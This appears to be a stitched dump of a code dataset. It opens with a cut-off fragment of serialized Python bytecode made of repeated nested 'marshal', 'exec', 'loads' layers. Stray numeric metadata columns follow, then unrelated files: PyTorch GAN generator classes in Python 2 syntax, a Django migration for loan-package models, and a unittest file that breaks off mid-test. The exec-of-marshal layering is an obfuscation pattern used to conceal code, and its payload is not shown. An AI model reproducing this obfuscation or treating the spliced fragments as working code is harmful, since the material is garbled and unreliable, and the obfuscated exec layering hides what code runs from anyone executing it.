x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x08\x01'))
| 97,759.5
| 195,504
| 0.774794
| 41,964
| 195,519
| 3.609117
| 0.028739
| 0.512634
| 0.527926
| 0.526025
| 0.88821
| 0.883825
| 0.881171
| 0.878636
| 0.875962
| 0.874238
| 0
| 0.409296
| 0.00044
| 195,519
| 2
| 195,504
| 97,759.5
| 0.365665
| 0
| 0
| 0
| 0
| 2
| 0.612198
| 0.61116
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 1
|
0
| 23
|
9bd7068451b4833f4f9ec4e11d861a50f33543f5
| 9,673
|
py
|
Python
|
Generators.py
|
simon555/autoencoders-for-gans
|
5162d09e1b03d1e37192778c238ef888afc28885
|
[
"MIT"
] | null | null | null |
Generators.py
|
simon555/autoencoders-for-gans
|
5162d09e1b03d1e37192778c238ef888afc28885
|
[
"MIT"
] | null | null | null |
Generators.py
|
simon555/autoencoders-for-gans
|
5162d09e1b03d1e37192778c238ef888afc28885
|
[
"MIT"
] | null | null | null |
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from utils import to_var
class Generator_FC(nn.Module):
def __init__(self,nout):
super(Generator_FC, self).__init__()
self.l1 = nn.Sequential(
nn.Linear(64, 1024),
nn.BatchNorm1d(1024),
nn.LeakyReLU(0.02),
nn.Linear(1024, 1024),
nn.BatchNorm1d(1024),
nn.LeakyReLU(0.02),
nn.Linear(1024, nout),
nn.Tanh())
def forward(self, z):
out = self.l1(z)
return out
class Generator_ConvCifar(nn.Module):
def __init__(self, batch_size, nz, num_steps_total=1):
super(Generator_ConvCifar, self).__init__()
self.batch_size = batch_size
self.nz = nz
self.l1 = nn.Sequential(
nn.Linear(nz, 512*4*4))
self.l2 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=5, padding=2, stride=1))
self.bn1 = nn.BatchNorm2d(256,1)
self.l3 = nn.Sequential(
nn.LeakyReLU(0.2),
nn.Upsample(scale_factor=2),
nn.Conv2d(256, 128, kernel_size=5, padding=2, stride=1))
self.bn2 = nn.BatchNorm2d(128)
self.l4 = nn.Sequential(
nn.LeakyReLU(0.2),
nn.Upsample(scale_factor=2),
nn.Conv2d(128, 128, kernel_size=5, padding=2, stride=1))
self.bn3 = nn.BatchNorm2d(128)
self.l5 = nn.Sequential(
nn.LeakyReLU(0.2),
nn.Upsample(scale_factor=2),
nn.Conv2d(128, 64, kernel_size=5, padding=2, stride=1))
self.bn4 = nn.BatchNorm2d(64)
self.l6 = nn.Sequential(
nn.LeakyReLU(0.2),
nn.Conv2d(64, 3, kernel_size=5, padding=2, stride=1),
nn.Tanh())
def forward(self, z, step=0):
print "no extra noise in decoder"
out = self.l1(z)
out = out.view(self.batch_size,512,4,4)
out = self.l2(out)
h2 = self.bn1(out)
out = self.l3(h2)
h3 = self.bn2(out)
h4l = self.l4(h3)
h4 = self.bn3(h4l)
h5l = self.l5(h4)
out = self.bn4(h5l)
out = self.l6(out)
print "gen size", out.size()
return out, h4l
#Returns 96x128
#3x4 -> 6x8 -> 12x16 -> 24x32 -> 48x64 -> 96x128
class Generator_ConvDuck(nn.Module):
def __init__(self, batch_size, nz):
super(Generator_ConvDuck, self).__init__()
self.batch_size = batch_size
self.nz = nz
self.l1 = nn.Sequential(
nn.Linear(nz*2, 512*3*4))
self.l2 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(256,affine=True),
nn.LeakyReLU(0.2),
nn.Upsample(scale_factor=2),
nn.Conv2d(256, 128, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(128,affine=True),
nn.LeakyReLU(0.2),
nn.Upsample(scale_factor=2),
nn.Conv2d(128, 128, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(128,affine=True),
nn.LeakyReLU(0.2),
nn.Upsample(scale_factor=2),
nn.Conv2d(128, 128, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(128,affine=True),
nn.LeakyReLU(0.2),
nn.Upsample(scale_factor=2),
nn.Conv2d(128, 64, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(64,affine=True),
nn.LeakyReLU(0.2),
nn.Upsample(scale_factor=2),
nn.Conv2d(64, 32, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(32,affine=True),
nn.LeakyReLU(0.2),
nn.Conv2d(32, 3, kernel_size=5, padding=2, stride=1),
nn.Tanh())
def forward(self, z):
print "no extra noise in decoder"
z_extra = 0.0 * to_var(torch.randn(self.batch_size, self.nz))
out = self.l1(torch.cat((z,z_extra), 1))
out = out.view(self.batch_size,512,3,4)
out = self.l2(out)
return out
class Gen_Bot_Conv32(nn.Module):
def __init__(self, batch_size,nz):
super(Gen_Bot_Conv32, self).__init__()
self.batch_size = batch_size
self.l1 = nn.Sequential(
nn.Linear(nz, 512*4*4))
self.l2 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(256),
nn.UpsamplingBilinear2d(scale_factor=2),
nn.LeakyReLU(0.02),
nn.Conv2d(256, 128, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.02),
nn.UpsamplingBilinear2d(scale_factor=2),
nn.Conv2d(128, 64, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(64),
nn.LeakyReLU(0.02),
nn.UpsamplingBilinear2d(scale_factor=2),
nn.Conv2d(64, 3, kernel_size=5, padding=2, stride=1),
nn.Tanh())
def forward(self, z, give_pre=False):
if give_pre:
out = z
else:
out = self.l1(z)
out = out.view(self.batch_size,512,4,4)
out = self.l2(out)
return out
class Gen_Bot_Conv32_deep1(nn.Module):
def __init__(self, batch_size,nz):
super(Gen_Bot_Conv32_deep1, self).__init__()
self.batch_size = batch_size
self.l1 = nn.Sequential(
nn.Linear(nz, 512*4*4))
self.l2 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.02),
nn.Upsample(scale_factor=2),
nn.Conv2d(256, 128, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.02),
nn.Conv2d(128, 64, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(64),
nn.LeakyReLU(0.02),
nn.Upsample(scale_factor=2),
nn.Conv2d(64, 32, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(32),
nn.LeakyReLU(0.02),
nn.Upsample(scale_factor=2),
nn.Conv2d(32, 32, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(32),
nn.LeakyReLU(0.02),
nn.Conv2d(32, 32, kernel_size=1, padding=0, stride=1),
nn.BatchNorm2d(32),
nn.LeakyReLU(0.02),
nn.Conv2d(32, 3, kernel_size=1, padding=0, stride=1),
nn.Tanh())
def forward(self, z, give_pre=False):
if give_pre:
out = z
else:
out = self.l1(z)
out = out.view(self.batch_size,512,4,4)
out = self.l2(out)
return out
class Gen_Bot_Conv32_deepbottleneck(nn.Module):
def __init__(self, batch_size,nz):
super(Gen_Bot_Conv32_deepbottleneck, self).__init__()
self.batch_size = batch_size
self.l1 = nn.Sequential(
nn.Linear(nz, 32*4*4))
self.l2 = nn.Sequential(
nn.Conv2d(32, 256, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.02),
nn.Upsample(scale_factor=2),
nn.Conv2d(256, 128, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.02),
nn.Conv2d(128, 64, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(64),
nn.LeakyReLU(0.02),
nn.Upsample(scale_factor=2),
nn.Conv2d(64, 32, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(32),
nn.LeakyReLU(0.02),
nn.Upsample(scale_factor=2),
nn.Conv2d(32, 32, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(32),
nn.LeakyReLU(0.02),
nn.Conv2d(32, 32, kernel_size=1, padding=0, stride=1),
nn.BatchNorm2d(32),
nn.LeakyReLU(0.02),
nn.Conv2d(32, 3, kernel_size=1, padding=0, stride=1),
nn.Tanh())
def forward(self, z, give_pre=False):
if give_pre:
out = z
else:
out = self.l1(z)
out = out.view(self.batch_size,32,4,4)
out = self.l2(out)
return out
class Gen_Bot_Joint(nn.Module):
def __init__(self, batch_size,nz):
super(Gen_Bot_Joint, self).__init__()
self.batch_size = batch_size
self.l1 = nn.Sequential(
nn.Linear(nz, 32*4*4))
self.l2 = nn.Sequential(
nn.Conv2d(32, 256, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.02),
nn.Upsample(scale_factor=2),
nn.Conv2d(256, 128, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.02),
nn.Conv2d(128, 64, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(64),
nn.LeakyReLU(0.02),
nn.Upsample(scale_factor=2),
nn.Conv2d(64, 32, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(32),
nn.LeakyReLU(0.02),
nn.Upsample(scale_factor=2),
nn.Conv2d(32, 32, kernel_size=5, padding=2, stride=1),
nn.BatchNorm2d(32),
nn.LeakyReLU(0.02),
nn.Conv2d(32, 32, kernel_size=1, padding=0, stride=1),
nn.BatchNorm2d(32),
nn.LeakyReLU(0.02),
nn.Conv2d(32, 3*5, kernel_size=1, padding=0, stride=1),
nn.Tanh())
def forward(self, z):
out = self.l1(z)
out = out.view(self.batch_size,32,4,4)
out = self.l2(out)
return out
| 33.470588
| 69
| 0.547193
| 1,333
| 9,673
| 3.83871
| 0.08027
| 0.057846
| 0.077389
| 0.109048
| 0.869064
| 0.865351
| 0.839554
| 0.824897
| 0.817471
| 0.809068
| 0
| 0.110237
| 0.316344
| 9,673
| 288
| 70
| 33.586806
| 0.663542
| 0.006306
| 0
| 0.767347
| 0
| 0
| 0.006038
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.02449
| null | null | 0.012245
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9bdd0aaaeaca32d36ec1b1d239c475fa324cceb3
| 3,209
|
py
|
Python
|
minmarkets/migrations/0001_initial.py
|
minsystems/minloansng
|
225f7c553dc1c7180431c5b84250560b74b0e9cc
|
[
"PostgreSQL",
"MIT"
] | null | null | null |
minmarkets/migrations/0001_initial.py
|
minsystems/minloansng
|
225f7c553dc1c7180431c5b84250560b74b0e9cc
|
[
"PostgreSQL",
"MIT"
] | null | null | null |
minmarkets/migrations/0001_initial.py
|
minsystems/minloansng
|
225f7c553dc1c7180431c5b84250560b74b0e9cc
|
[
"PostgreSQL",
"MIT"
] | null | null | null |
# Generated by Django 3.0.2 on 2020-05-17 17:05
import accounts.models
import cloudinary.models
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='LoanCalculators',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=300, null=True)),
('price', models.IntegerField(default=3000)),
('premium_package', models.BooleanField(default=True)),
('package_owner', models.CharField(max_length=300)),
('description', models.TextField()),
('file', models.CharField(blank=True, help_text='download link here!', max_length=300, null=True)),
('product_code', models.CharField(blank=True, max_length=10, null=True)),
('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name=accounts.models.upload_image_path)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='LoanCollectionPackage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=300, null=True)),
('price', models.IntegerField(default=3000)),
('premium_package', models.BooleanField(default=True)),
('package_owner', models.CharField(max_length=300)),
('description', models.TextField()),
('product_code', models.CharField(blank=True, max_length=10, null=True)),
('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name=accounts.models.upload_image_path)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='LoanPackage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=300, null=True)),
('price', models.IntegerField(default=3000)),
('premium_package', models.BooleanField(default=True)),
('package_owner', models.CharField(max_length=300)),
('description', models.TextField()),
('product_code', models.CharField(blank=True, max_length=10, null=True)),
('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name=accounts.models.upload_image_path)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
),
]
| 50.936508
| 148
| 0.604861
| 323
| 3,209
| 5.854489
| 0.226006
| 0.061872
| 0.057113
| 0.085669
| 0.841354
| 0.830777
| 0.830777
| 0.830777
| 0.830777
| 0.830777
| 0
| 0.026371
| 0.255531
| 3,209
| 62
| 149
| 51.758065
| 0.765174
| 0.014023
| 0
| 0.763636
| 1
| 0
| 0.102783
| 0.006641
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.054545
| 0
| 0.127273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5018dc69bc33f2a63403c8af95e1810a9cc305cb
| 4,980
|
py
|
Python
|
test/t1000/unit/application/dependency_injection/result_factory/__init__.py
|
helcerion/T1000
|
25684e88dc8adb37fe07ff358f84f797f7b9c716
|
[
"MIT"
] | 1
|
2021-08-23T01:33:03.000Z
|
2021-08-23T01:33:03.000Z
|
test/t1000/unit/application/dependency_injection/result_factory/__init__.py
|
helcerion/T1000
|
25684e88dc8adb37fe07ff358f84f797f7b9c716
|
[
"MIT"
] | 20
|
2019-10-29T10:55:27.000Z
|
2022-03-12T00:04:50.000Z
|
test/t1000/unit/application/dependency_injection/result_factory/__init__.py
|
helcerion/T1000
|
25684e88dc8adb37fe07ff358f84f797f7b9c716
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import patch
from src.t1000.application.dependency_injection.result_factory import EventsResultFactory
class EventsResultFactoryTestCase(unittest.TestCase):
def setUp(self):
return super().setUp()
def tearDown(self):
return super().tearDown()
@patch('src.t1000.application.dependency_injection.result_factory.HtmlEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.ConsoleEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.EventsCommandFactory')
@patch('src.t1000.application.dependency_injection.result_factory.EventsResourceFactory')
def test_create_with_resource_exception(self, resource_mock, command_mock, console_mock, html_mock):
resource_mock.create.side_effect = Exception('Raise exception')
with self.assertRaises(Exception) as e:
EventsResultFactory.create('exception', 'exception', 'exception', 'exception', 'exception')
self.assertEqual(str(e.exception), 'Raise exception')
resource_mock.create.assert_called_once_with('exception')
command_mock.create.assert_not_called()
console_mock.assert_not_called()
html_mock.assert_not_called()
@patch('src.t1000.application.dependency_injection.result_factory.HtmlEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.ConsoleEventsResult')
@patch('src.t1000.application.dependency_injection.result_factory.EventsCommandFactory')
@patch('src.t1000.application.dependency_injection.result_factory.EventsResourceFactory')
def test_create_with_command_exception(self, resource_mock, command_mock, console_mock, html_mock):
command_mock.create.side_effect = Exception('Raise exception')
with self.assertRaises(Exception) as e:
